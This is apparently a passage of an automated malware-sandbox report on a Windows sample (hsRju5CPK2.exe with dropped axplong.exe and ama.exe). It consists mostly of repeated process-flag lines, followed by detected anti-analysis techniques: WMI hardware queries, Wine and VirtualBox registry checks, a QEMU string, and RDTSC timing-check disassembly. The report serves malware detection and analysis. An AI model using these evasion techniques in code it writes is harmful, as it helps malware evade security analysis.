Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\hsRju5CPK2.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe, 00000017.00000002.2259714119.00000000031D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE@\]Q
Source: RegAsm.exe, 00000017.00000002.2259714119.00000000031D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC0CE2 second address: CC0D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D5D4BD01Bh 0x00000009 jns 00007F0D5D4BD016h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F0D5D4BD01Fh 0x00000018 jg 00007F0D5D4BD016h 0x0000001e jg 00007F0D5D4BD016h 0x00000024 popad 0x00000025 pushad 0x00000026 jmp 00007F0D5D4BD026h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC0D30 second address: CC0D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC0D3F second address: CC0D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC0D4A second address: CC0D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC0D4E second address: CC0D56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC0D56 second address: CC0D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F0D5D345976h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC0FEB second address: CC1001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0D5D4BD016h 0x0000000a jmp 00007F0D5D4BD01Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC1001 second address: CC103F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jl 00007F0D5D345976h 0x0000000e jmp 00007F0D5D34597Ah 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F0D5D345981h 0x0000001a pop eax 0x0000001b popad 0x0000001c pushad 0x0000001d jmp 00007F0D5D34597Dh 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC11F8 second address: CC1224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F0D5D4BD016h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b js 00007F0D5D4BD016h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0D5D4BD022h 0x00000019 ja 00007F0D5D4BD016h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC4EEE second address: CC4F06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345984h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC4F06 second address: CC4F2C instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D5D4BD02Ah 0x00000008 jmp 00007F0D5D4BD024h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC4F2C second address: CC4F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D345989h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC4F49 second address: CC4F66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d jbe 00007F0D5D4BD01Ch 0x00000013 je 00007F0D5D4BD016h 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC4FD0 second address: CC4FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC4FD4 second address: CC4FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0D5D4BD01Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC4FEA second address: CC5028 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D5D345978h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d xor si, 0217h 0x00000012 push 00000000h 0x00000014 adc cl, FFFFFF81h 0x00000017 mov dword ptr [ebp+122D2B22h], eax 0x0000001d call 00007F0D5D345979h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F0D5D345986h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC5028 second address: CC502D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC502D second address: CC5033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC5033 second address: CC505D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F0D5D4BD020h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 je 00007F0D5D4BD024h 0x00000017 push eax 0x00000018 push edx 0x00000019 jo 00007F0D5D4BD016h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC505D second address: CC506B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC506B second address: CC5071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC5071 second address: CC5077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
